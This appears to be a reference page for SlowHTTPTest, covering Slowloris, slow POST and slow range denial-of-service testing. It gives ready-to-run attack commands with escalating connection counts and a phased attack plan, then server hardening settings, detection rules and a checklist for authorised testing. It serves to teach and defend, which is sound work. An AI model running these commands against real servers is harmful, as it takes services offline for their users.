Skip to content

SlowHTTPTest

SlowHTTPTest is a benchmarking and DoS testing tool designed to expose application-layer vulnerabilities in web servers. It simulates slow HTTP attacks including Slowloris (slow headers), slow POST (R.U.D.Y.), and slow range attacks that exploit the way servers allocate resources to long-lived connections. Unlike volumetric attacks, slow HTTP attacks use minimal bandwidth and low connection counts to exhaust server resources, making them difficult to detect with traditional rate-limiting defenses. SlowHTTPTest is essential for web application security assessments and server hardening validation.

sudo apt-get update
sudo apt-get install slowhttptest
sudo dnf install slowhttptest
brew install slowhttptest
git clone https://github.com/shekyan/slowhttptest.git
cd slowhttptest
./configure
make
sudo make install
slowhttptest -h
slowhttptest -v
slowhttptest -u <URL> -c <connections> -H -g -o <output-file>
slowhttptest -h        # Display help message
slowhttptest -v        # Show version information
slowhttptest -help     # Extended help

Slowloris attacks hold HTTP connections open by sending headers very slowly, preventing the server from processing new requests. The server allocates a thread/worker to each connection, eventually exhausting all available resources.

slowhttptest -u http://target.com -H -c 100 -g

Send 100 slow header attacks against target.com and generate statistics.

OptionDescription
-uTarget URL (http://host:port/path)
-HSlowloris (slow headers) attack mode
-c 100Number of simultaneous connections
-gGenerate statistics output (CSV)
slowhttptest -u http://target.com:8080 -H -c 50 -N -g -o slowloris_test

Run 50 slow header connections until timeout (-N = no timeout), save stats to slowloris_test.csv.

OptionDescription
-NNo timeout (run until server breaks)
-o Output file for statistics
-r 500Send request every 500ms
slowhttptest -u http://target.com -H -c 200 -r 1000 -w 10 -x 4096

200 connections, send data every 1000ms, 10-byte window, max 4KB header before sending.

OptionDescription
-r 1000Milliseconds between requests sent
-w 10Bytes sent per window
-x 4096Max header size before full request
slowhttptest -u http://192.168.1.100 -H -c 300 -i 10 \
  -r 200 -w 5 -t GET -m 16 -g -o results
OptionDescription
-i 10Seconds between status updates
-r 200Interval between data sends (ms)
-w 5Window size (bytes)
-t GETHTTP method (GET, POST, etc.)
-m 16Request multiplier

Slow POST attacks (R.U.D.Y. - Are You Dead Yet?) exploit the Content-Length header by sending POST data extremely slowly. The server keeps the connection alive waiting for the body, exhausting resources.

slowhttptest -u http://target.com/form.php -B -c 100 -g

Send 100 slow POST bodies to target endpoint.

OptionDescription
-uTarget URL (must accept POST)
-BSlow POST (R.U.D.Y.) attack mode
-c 100Concurrent POST bodies
-gGenerate statistics
slowhttptest -u http://target.com -B -c 50 -l 10000 -r 500 -g

Send 50 POST requests with 10KB body, one byte every 500ms.

OptionDescription
-l 10000Content length in bytes
-r 500Milliseconds between body chunks
-w 1Single byte per window
slowhttptest -u http://target.com -B -c 200 -l 50000 -r 100 \
  -w 1 -t POST -g -o post_attack

Large payload (50KB), 200 connections, very slow transmission (1 byte/100ms).

OptionDescription
-l 5000050KB POST body
-r 100Send every 100ms
-w 1Minimum window
slowhttptest -u http://target.com/api/upload -B -c 100 \
  -l 100000 -r 1000 -g

Target upload endpoint with very large, very slow POST body.

Slow Range attacks exploit HTTP Range request headers. Servers processing range requests allocate resources for each range specification. Sending many overlapping or sequential ranges slowly exhausts memory and CPU.

slowhttptest -u http://target.com/large_file.bin -R -c 100 -g

Send 100 slow range requests against target file.

OptionDescription
-uTarget URL (static file)
-RSlow range attack mode
-c 100Concurrent range requests
-gGenerate statistics
slowhttptest -u http://target.com/download.iso -R -c 150 \
  -r 500 -w 100 -g -o range_test

150 connections requesting overlapping file ranges every 500ms.

OptionDescription
-r 500Interval between ranges
-w 100Bytes per range segment
-o range_testOutput statistics file
slowhttptest -u http://target.com/large.zip -R -c 200 \
  -l 1000000 -r 100 -w 1 -g

Target 1MB file with 200 slow range requests.

OptionDescription
-l 1000000Target file size
-r 100Range request interval
-w 1Minimal window
slowhttptest -u http://target.com -H -c 50
slowhttptest -u http://target.com -H -c 100
slowhttptest -u http://target.com -H -c 500

Start with low connection counts and increase to identify server threshold.

slowhttptest -u http://target.com -H -c 100 -r 100    # Fast (100ms)
slowhttptest -u http://target.com -H -c 100 -r 1000   # Slow (1s)
slowhttptest -u http://target.com -H -c 100 -r 5000   # Very slow (5s)
slowhttptest -u http://target.com -H -c 100 -w 1      # 1 byte chunks
slowhttptest -u http://target.com -H -c 100 -w 10     # 10 byte chunks
slowhttptest -u http://target.com -H -c 100 -w 1024   # 1KB chunks
slowhttptest -u http://target.com -B -c 50 -x 8192

Limit header size to 8KB before completing request transmission.

OptionDescription
-x 8192Max header bytes
slowhttptest -u http://target.com -H -t GET          # GET request
slowhttptest -u http://target.com -H -t HEAD         # HEAD request
slowhttptest -u http://target.com -H -t POST         # POST request
slowhttptest -u http://target.com -H -t PUT          # PUT request
slowhttptest -u http://target.com -H -t OPTIONS      # OPTIONS request
slowhttptest -u http://target.com -H -c 100 \
  -A "Mozilla/5.0 (Custom User Agent)"
slowhttptest -u http://target.com -H -c 100 \
  -H "X-Custom-Header: value"
slowhttptest -u http://target.com -H -c 100 -t 300

Timeout connections after 300 seconds (5 minutes).

OptionDescription
-t 300Timeout in seconds
slowhttptest -u http://target.com -H -c 100 -N

Continue sending slow data (-N flag) until server closes connection or timeout reached.

OptionDescription
-NNo fixed timeout, continuous
slowhttptest -u http://target.com -H -c 100 -i 5

Display status updates every 5 seconds.

OptionDescription
-i 5Interval between updates (seconds)
slowhttptest -u http://target.com -H -c 100 -g -o results.csv

Run test and save connection statistics to CSV file.

OptionDescription
-gEnable statistics generation
-o Output file name
Window size: 10 bytes
Bytes sent: 1024000
Test duration: 312 seconds
Connections created: 100
Connections completed: 85
Connections timed out: 15
Bytes received: 51200
  • Total requests sent: Number of slow requests initiated
  • Completed connections: Server accepted and closed normally
  • Timed out connections: Server killed slow connections
  • Bytes received: Server responses (responses = resilience)
  • Test duration: Time until all connections resolved
slowhttptest -u http://target.com -H -c 50 -v

Display verbose connection and transmission details.

slowhttptest -u http://target.com -H -c 1 -t 30 -i 2

Single connection test to probe server timeout and response behavior.

# Test Slowloris
slowhttptest -u http://target.com -H -c 100 -g -o slowloris.csv

# Test Slow POST
slowhttptest -u http://target.com -B -c 100 -g -o slowpost.csv

# Test Slow Range
slowhttptest -u http://target.com/file.bin -R -c 100 -g -o range.csv
slowhttptest -u http://target.com -H -c 5 -v -t 600

Run small test with verbose output to identify web server type and resource limits.

# Test basic connectivity
curl -I http://target.com

# Check for custom headers (may indicate WAF/IDS)
curl -v http://target.com

# Identify HTTP version support
curl --http1.1 http://target.com
curl --http2 http://target.com
# Single connection baseline
slowhttptest -u http://target.com -H -c 1 -t 300 \
  -r 1000 -w 10 -i 30 -g -o baseline.csv

Establish server response time and stability with minimal load.

# Start with low connection count
slowhttptest -u http://target.com -H -c 10 -t 600 -g -o test_10.csv

# Double connections
slowhttptest -u http://target.com -H -c 20 -t 600 -g -o test_20.csv

# Continue increasing
slowhttptest -u http://target.com -H -c 50 -t 600 -g -o test_50.csv
slowhttptest -u http://target.com -H -c 100 -t 600 -g -o test_100.csv
# Test most effective vector based on Phase 3 results
slowhttptest -u http://target.com -H -c 100 -N -g -o final_test.csv
# Monitor server during test
watch -n 1 'netstat -an | grep ESTABLISHED | wc -l'

# Check CPU and memory
top
vmstat 1

# Monitor application logs
tail -f /var/log/apache2/access.log
tail -f /var/log/nginx/access.log
  • Completed connections >> Timed out: Server has high timeout; slow attacks effective
  • Timed out >> Completed: Server has aggressive timeout; requires slower transmission
  • Rapid error responses: Server rate-limiting enabled
  • No responses: Server may be processing connections synchronously (vulnerable)
  • Rapid increase in incomplete connections: Threshold identified
  • Connection reset messages: Server hitting resource limits
  • Application errors: Database connection pool exhausted
  • System resource warnings: CPU/memory saturation detected
Connections created: 150
Connections completed: 12
Connections timed out: 138
Avg response time: 0ms (most got no response)
Legitimate traffic: Unable to connect
# Install mod_ratelimit for connection limiting
sudo a2enmod ratelimit
sudo a2enmod reqtimeout

# Configure request timeout
sudo nano /etc/apache2/mods-available/reqtimeout.conf

Apache Configuration:

<IfModule mod_reqtimeout.c>
  RequestReadTimeout header=20,minrate=500 body=20,minrate=500
</IfModule>

Force minimum 500 bytes/second header transmission rate.

sudo nano /etc/nginx/nginx.conf

Nginx Configuration:

client_body_timeout 10s;
client_header_timeout 10s;
client_body_buffer_size 1K;
client_header_buffer_size 1K;
client_max_body_size 2m;
keepalive_timeout 5s 5s;
send_timeout 10s;
sudo nano /etc/haproxy/haproxy.cfg

HAProxy Settings:

timeout client 10s
timeout server 10s
timeout connect 5s
timeout http-keep-alive 3s
timeout http-request 10s
option http-server-close
option forwardfor
maxconn 256
# Linux limit open files
ulimit -n 65536

# Configure in /etc/security/limits.conf
* soft nofile 65536
* hard nofile 65536
# Limit new connections per IP
sudo iptables -A INPUT -p tcp --dport 80 -m limit \
  --limit 25/minute --limit-burst 100 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j DROP
sudo apt-get install libapache2-mod-security2

# Enable and configure
sudo a2enmod security2
sudo cp /etc/modsecurity/modsecurity.conf-recommended \
  /etc/modsecurity/modsecurity.conf

# Configure rules
sudo cp /usr/share/modsecurity-core-rules/*.conf \
  /etc/modsecurity/rules/

Deploy reverse proxy (Nginx, HAProxy) to:

  • Enforce connection timeouts
  • Implement per-IP rate limiting
  • Buffer incomplete requests
  • Offload slow client handling
# Python Flask example
from flask import Flask
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

app = Flask(__name__)
limiter = Limiter(
    app=app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"]
)

@app.route('/')
@limiter.limit("10 per minute")
def index():
    return "Hello, World!"
# Watch connection count in real-time
watch -n 1 'ss -tan | grep ESTABLISHED | wc -l'

# Per-IP connection count
ss -tan | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
# Find incomplete requests (no final CRLF)
grep -E 'incomplete|timeout' /var/log/apache2/access.log

# Identify slow clients
tail -f /var/log/apache2/access.log | \
  awk '$NF > 30 {print "Slow: " $0}'
alert http any any -> any any \
  (msg:"Possible Slowloris Attack"; \
  content:"GET "; http_method; \
  byte_test:1,>,0,0,relative; \
  timeout:60; sid:1000001;)

alert http any any -> any any \
  (msg:"Slow POST Detected"; \
  content:"Content-Length|3a|"; \
  byte_test:4,>,10000,0,relative; \
  timeout:600; sid:1000002;)
  • Only test against systems you own or have explicit written permission to test
  • Obtain management approval before conducting DoS testing in production
  • Notify operations and security teams before testing begins
  • Establish rollback procedures in case of legitimate user impact
  • Document all test parameters and results
  • Use isolated lab or development environments for initial testing
  • Comply with all applicable laws regarding unauthorized access and denial of service
  • Ensure adequate monitoring and incident response procedures are in place
  • Train development teams on secure connection handling practices